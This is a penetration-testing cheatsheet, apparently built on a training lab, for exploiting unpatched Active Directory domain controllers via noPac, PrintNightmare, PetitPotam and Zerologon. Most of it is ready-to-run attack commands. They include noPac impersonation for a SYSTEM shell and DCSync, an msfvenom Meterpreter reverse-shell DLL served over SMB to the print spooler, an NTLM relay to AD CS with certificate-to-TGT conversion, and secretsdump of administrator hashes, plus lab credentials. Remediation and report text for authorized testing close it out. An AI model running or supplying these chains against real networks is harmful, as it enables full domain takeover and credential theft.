š”ļø Methodology Checklist
- NoPac (CVE-2021-42278/42287):
noPac.py [DOMAIN]/[USER]:[PASS] -dc-ip [DC] --impersonate Administrator -dump - PrintNightmare (CVE-2021-1675/34527): check spooler service, deliver DLL
- PetitPotam (CVE-2021-36942):
PetitPotam.py [LHOST] [DC_IP]+ ntlmrelayx to ADCS - ZeroLogon (CVE-2020-1472): test only ā immediately restore password after PoC
- Verify vulnerability before exploitation: use check/detection scripts first
- Document CVE ID, impact, and remediation for report
šÆ Operational Context
Use when: Target DC is unpatched ā check for noPac, PrintNightmare, PetitPotam, Zerologon, and other recent critical AD CVEs.
Think Dumber First: nxc smb [DC] -u '' -p '' -M zerologon and nxc smb [DC] -u [USER] -p [PASS] -M nopac ā these are the highest-impact single-command checks. Zerologon = instant DA with no creds. noPac = DA from any domain user.
Skip when: DC is patched past KB dates for each CVE ā confirm patch status before attempting.
ā” Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
([adsi]"LDAP://$(([adsi]'LDAP://RootDSE').defaultNamingContext)")."ms-DS-MachineAccountQuota" | Check machine account quota (NoPac prereq ā must be > 0) |
sudo python3 scanner.py [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -use-ldap | NoPac ā check if DC is vulnerable |
sudo python3 noPac.py [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -dc-host [DC_HOST] -shell --impersonate administrator -use-ldap | NoPac ā get SYSTEM shell impersonating administrator |
sudo python3 noPac.py [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -dc-host [DC_HOST] --impersonate administrator -use-ldap -dump -just-dc-user [DOMAIN]/administrator | NoPac ā DCSync administrator hash directly |
rpcdump.py @[DC_IP] | egrep 'MS-RPRN|MS-PAR' | PrintNightmare ā check if spooler is exposed |
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f dll > backupscript.dll | PrintNightmare ā generate malicious DLL |
sudo smbserver.py -smb2support CompData /path/to/backupscript.dll | PrintNightmare ā host DLL on SMB share |
sudo python3 CVE-2021-1675.py [DOMAIN]/[USER]:[PASS]@[DC_IP] '\\[LHOST]\CompData\backupscript.dll' | PrintNightmare ā trigger DLL load (requires cube0x0 Impacket fork) |
sudo ntlmrelayx.py -debug -smb2support --target http://[CA_HOST]/certsrv/certfnsh.asp --adcs --template DomainController | PetitPotam ā relay NTLM to AD CS Web Enrollment |
python3 PetitPotam.py [LHOST] [DC_IP] | PetitPotam ā coerce DC to authenticate to attack host |
python3 /opt/PKINITtools/gettgtpkinit.py [DOMAIN]/[DC_HOST]\$ -pfx-base64 [B64_CERT] dc01.ccache | PetitPotam ā convert certificate to TGT |
export KRB5CCNAME=dc01.ccache | Set ccache ticket for use with Impacket |
secretsdump.py -just-dc-user [DOMAIN]/administrator -k -no-pass [DC_HOST]\$@[DC_FQDN] | PetitPotam ā DCSync via DC TGT |
š¬ Deep Dive & Workflow
CVE Selection Guide
| Vulnerability | CVEs | Requires | Impact | Risk |
|---|---|---|---|---|
| NoPac | CVE-2021-42278 + CVE-2021-42287 | Domain user + machine quota > 0 | DA from standard user | Noisy (smbexec service) |
| PrintNightmare | CVE-2021-34527 / CVE-2021-1675 | Valid creds + spooler exposed | SYSTEM RCE on DC | Can crash print spooler |
| PetitPotam | CVE-2021-36942 | Unauthenticated + AD CS present | Full domain via DCSync | Moderate |
NoPac (SamAccountName Spoofing)
Chains two bugs: machine accounts can rename their SamAccountName (42278), and the KDC issues tickets under the renamed name when requesting TGS after rename (42287). Net result: rename a machine account to match a DC name ā get a ticket as that DC.
# 1. Check quota (must be > 0 ā default is 10)
# Windows ADSI check (no admin needed):
$domain = ([adsi]"LDAP://RootDSE").defaultNamingContext
([adsi]"LDAP://$domain")."ms-DS-MachineAccountQuota"
# 2. Linux ā scan and verify
sudo python3 scanner.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap
# 3. Exploit ā smbexec shell as administrator
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap
# Alternative ā skip shell, DCSync directly
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administratorWatch out: smbexec creates BTOBTO services and .bat files ā Defender flags this. Use absolute paths inside the shell. Set quota = 0 to fully mitigate.
PrintNightmare (Windows Print Spooler RCE)
Attacker hosts a malicious DLL on an unauthenticated SMB share, then coerces the DCās spooler to load it via MS-RPRN:
# Check exposure
rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'
# Generate DLL payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll
# Host on SMB (smb2support required)
sudo smbserver.py -smb2support CompData /tmp/
# Catch in MSF
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Trigger
sudo python3 CVE-2021-1675.py INLANEFREIGHT.LOCAL/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'Requires cube0x0ās Impacket fork ā uninstall default Impacket first or the RPC calls fail.
PetitPotam (MS-EFSRPC Coercion ā AD CS Relay)
Unauthenticated attacker coerces DC to authenticate via NTLM, relays that auth to AD CS Web Enrollment to obtain a DC certificate, then uses it for Kerberos (PKINIT) to get a DC TGT ā DCSync:
# Terminal 1: relay to AD CS
sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController
# Terminal 2: coerce DC
python3 PetitPotam.py 172.16.5.225 172.16.5.5
# Copy Base64 cert from ntlmrelayx output, then:
python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 [B64_CERT] dc01.ccache
export KRB5CCNAME=dc01.ccache
secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass ACADEMY-EA-DC01\$@ACADEMY-EA-DC01.INLANEFREIGHT.LOCALIf DCSync via ccache fails: use getnthash.py to extract the DCās NT hash from the TGT, then pass-the-hash to secretsdump.py. Alternatively, pass the Base64 cert directly to Rubeus.exe asktgt /ptt on a Windows host.
š ļø Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Zerologon exploit corrupts DC | Machine account password reset corrupts | Only use safe test mode first: python zerologon_tester.py [DC_NAME] [DC_IP] ā non-destructive check |
| noPac exploit fails with KDC error | DC patched or wrong domain format | Confirm patch: December 2021 cumulative update patches noPac (CVE-2021-42278/42287) |
| PrintNightmare RCE fails | Driver path issue | Use: impacket-rpcdump @[TARGET] | grep MS-RPRN to confirm Print Spooler running before attempting |
| PetitPotam triggers but no capture | NTLM relay not set up | PetitPotam is a trigger ā combine with impacket-ntlmrelayx targeting ADCS HTTP enrollment |
| Exploit requires newer impacket | Version too old | Update: pip3 install impacket --upgrade or git clone https://github.com/fortra/impacket.git && pip3 install . |
š Reporting Trigger
Finding Title: Domain Controller Vulnerable to Critical Pre-Auth CVE Impact: Unpatched domain controllers vulnerable to Zerologon, noPac, or PetitPotam allow complete domain compromise from zero credentials (Zerologon) or any domain user credentials (noPac), making the entire AD forest immediately compromisable. Root Cause: Critical security patches not applied within required remediation timeframe. Patch management process insufficient for prioritizing AD-critical CVEs. Recommendation: Immediately apply all outstanding Windows Server security patches on all Domain Controllers. Implement automated patching for DCs with 24-hour SLA for critical CVEs. Monitor DCs via Microsoft Defender for Identity for exploit attempt indicators.